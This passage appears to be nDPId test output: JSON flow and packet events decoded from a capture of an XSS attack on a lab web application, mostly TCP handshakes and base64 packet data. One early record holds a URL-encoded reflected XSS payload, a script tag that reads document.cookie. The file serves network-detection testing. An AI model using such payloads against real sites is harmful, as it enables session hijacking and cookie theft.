{"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27AQ80NQUS4TAQLQVWHMAGXB11KUBK34NZA8RUUD143IFKQDS3P5%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347038276,"flow_last_seen":1499347038276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347038276,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52964,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1499347038276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347038276,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83pNAAD4G5zysEAABwKgKMs7kAFBDY\/JIAAAAAKACchAsDwAAAgQFtAQCCAoBOSzbAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1499347038276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347038276,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzuS5pPWWQ2PySaAScSB7fQAAAgQFtAQCCAoD4v5SATks2wEDAwc="} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1499347038277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347038277,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03pRAAD4G50OsEAABwKgKMs7kAFBDY\/JJuaT1l4AQAOUahAAAAQEICgE5LNwD4v5S"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347039587,"flow_last_seen":1499347039587,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347039587,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52978,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1499347039587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347039587,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LfVAAD4Gl9usEAABwKgKMs7yAFDXyAPWAAAAAKACchCExgAAAgQFtAQCCAoBOS4jAAAAAAEDAwc="} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1499347039587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347039587,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzvKH9tkB18gD16AScSAhMAAAAgQFtAQCCAoD4v+aATkuIwEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1499347039588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347039588,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LfZAAD4Gl+KsEAABwKgKMs7yAFDXyAPXh\/bZAoAQAOXANwAAAQEICgE5LiMD4v+a"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347042150,"flow_last_seen":1499347042150,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347042150,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53004,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1499347042150,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347042150,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8q1JAAD4GGn6sEAABwKgKMs8MAFB23Zv2AAAAAKACchBK9gAAAgQFtAQCCAoBOTCkAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1499347042150,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347042150,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzwwb3aSHdt2b96AScSCFcgAAAgQFtAQCCAoD4wIbATkwpAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":661,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1499347042150,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347042150,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0q1NAAD4GGoWsEAABwKgKMs8MAFB23Zv3G92kiIAQAOUkegAAAQEICgE5MKQD4wIb"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347043416,"flow_last_seen":1499347043416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347043416,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53018,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1499347043416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347043416,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8okxAAD4GI4SsEAABwKgKMs8aAFDJVZOtAAAAAKACchD\/ewAAAgQFtAQCCAoBOTHhAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1499347043417,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347043417,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzxosqk4zyVWTrqAScSB+QwAAAgQFtAQCCAoD4wNXATkx4QEDAwc="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1499347043417,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347043417,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ok1AAD4GI4usEAABwKgKMs8aAFDJVZOuLKpONIAQAOUdSwAAAQEICgE5MeED4wNX"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":683,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347044676,"flow_last_seen":1499347044676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347044676,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53032,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1499347044676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347044676,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QP5AAD4GhNKsEAABwKgKMs8oAFCcEnPlAAAAAKACchBLPwAAAgQFtAQCCAoBOTMbAAAAAAEDAwc="} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1499347044676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347044676,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzyh2l2DwnBJz5qAScSBsIQAAAgQFtAQCCAoD4wSSATkzGwEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1499347044677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347044677,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QP9AAD4GhNmsEAABwKgKMs8oAFCcEnPmdpdg8YAQAOULKAAAAQEICgE5MxwD4wSS"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347047249,"flow_last_seen":1499347047249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347047249,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53058,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1499347047249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347047249,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rOxAAD4GGOSsEAABwKgKMs9CAFBNBJlzAAAAAKACchByIQAAAgQFtAQCCAoBOTWfAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1499347047249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347047249,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz0I8cGwCTQSZdKAScSC\/lQAAAgQFtAQCCAoD4wcVATk1nwEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1499347047250,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347047250,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rO1AAD4GGOusEAABwKgKMs9CAFBNBJl0PHBsA4AQAOVenQAAAQEICgE5NZ8D4wcV"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347048548,"flow_last_seen":1499347048548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347048548,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53072,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1499347048548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347048548,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rW1AAD4GGGOsEAABwKgKMs9QAFDoOZuOAAAAAKACchDTfgAAAgQFtAQCCAoBOTbjAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1499347048548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347048548,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz1DxNtWr6Dmbj6AScSABPgAAAgQFtAQCCAoD4whaATk24wEDAwc="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1499347048549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347048549,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rW5AAD4GGGqsEAABwKgKMs9QAFDoOZuP8TbVrIAQAOWgRAAAAQEICgE5NuQD4wha"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":731,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347051144,"flow_last_seen":1499347051144,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347051144,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":731,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1499347051144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347051144,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82StAAD4G7KSsEAABwKgKMs9qAFDGDOBHAAAAAKACchCuTwAAAgQFtAQCCAoBOTlsAAAAAAEDAwc="} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1499347051144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347051144,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz2oBc4vXxgzgSKAScSATHgAAAgQFtAQCCAoD4wrjATk5bAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":733,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1499347051145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347051145,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02SxAAD4G7KusEAABwKgKMs9qAFDGDOBIAXOL2IAQAOWyJAAAAQEICgE5OW0D4wrj"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347052434,"flow_last_seen":1499347052434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347052434,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53112,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1499347052434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347052434,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8athAAD4GWvisEAABwKgKMs94AFBfSFB3AAAAAKACchCjkwAAAgQFtAQCCAoBOTqvAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1499347052435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347052435,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz3hoydAQX0hQeKAScSBbjwAAAgQFtAQCCAoD4wwmATk6rwEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1499347052435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347052435,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0atlAAD4GWv+sEAABwKgKMs94AFBfSFB4aMnQEYAQAOX6lgAAAQEICgE5Oq8D4wwm"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347053735,"flow_last_seen":1499347053735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347053735,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53126,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1499347053735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347053735,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TcZAAD4GeAqsEAABwKgKMs+GAFAPQXYyAAAAAKACchDMjAAAAgQFtAQCCAoBOTv0AAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1499347053736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347053736,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz4b8rqheD0F2M6AScSAXEAAAAgQFtAQCCAoD4w1rATk79AEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":757,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1499347053736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347053736,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TcdAAD4GeBGsEAABwKgKMs+GAFAPQXYz\/K6oX4AQAOW2FgAAAQEICgE5O\/UD4w1r"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347056332,"flow_last_seen":1499347056332,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347056332,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1499347056332,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347056332,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GMxAAD4GrQSsEAABwKgKMs+gAFAIRCayAAAAAKACchAgZgAAAgQFtAQCCAoBOT5+AAAAAAEDAwc="} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":771,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1499347056333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347056333,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz6DSyc0OCEQms6AScSBtlQAAAgQFtAQCCAoD4w\/0ATk+fgEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":772,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1499347056333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347056333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GM1AAD4GrQusEAABwKgKMs+gAFAIRCaz0snND4AQAOUMnQAAAQEICgE5Pn4D4w\/0"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":785,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347057628,"flow_last_seen":1499347057628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347057628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53166,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":785,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1499347057628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347057628,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8yDFAAD4G\/Z6sEAABwKgKMs+uAFAuuffwAAAAAKACchAnYQAAAgQFtAQCCAoBOT\/BAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1499347057628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347057628,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz662huYkLrn38aAScSB2eQAAAgQFtAQCCAoD4xE4ATk\/wQEDAwc="} 